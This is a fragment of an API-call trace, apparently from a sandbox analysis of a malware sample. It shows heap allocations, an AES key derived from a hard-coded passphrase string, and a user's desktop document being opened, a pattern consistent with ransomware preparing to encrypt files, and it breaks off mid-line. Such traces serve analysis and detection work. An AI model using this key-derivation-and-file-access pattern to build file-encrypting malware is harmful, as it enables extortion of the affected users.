RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0123.558] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e27e8 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b18 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0123.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2848 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0123.559] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0123.559] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0123.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0123.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca880 [0123.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca880, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0123.641] CryptHashData (hHash=0x41ac200, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0123.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0123.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0123.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0123.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0123.643] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0123.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0123.643] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0123.644] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0123.644] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0123.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0123.644] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac500) returned 1 [0123.644] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0123.644] CryptDestroyHash (hHash=0x41ac200) returned 1 [0123.645] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\jhcqtc-oyo hp07enj.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0123.645] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.645] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.645] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0123.645] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e310 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0123.646] HeapFree (in: 